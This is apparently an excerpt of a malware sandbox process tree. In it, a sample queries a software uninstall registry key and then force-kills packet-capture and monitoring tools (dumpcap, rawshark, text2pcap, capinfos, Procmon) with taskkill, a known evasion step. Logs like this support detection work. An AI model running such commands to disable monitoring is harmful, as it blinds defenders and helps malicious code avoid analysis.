C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1900
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1904
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1768
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1624
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1940
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1764
-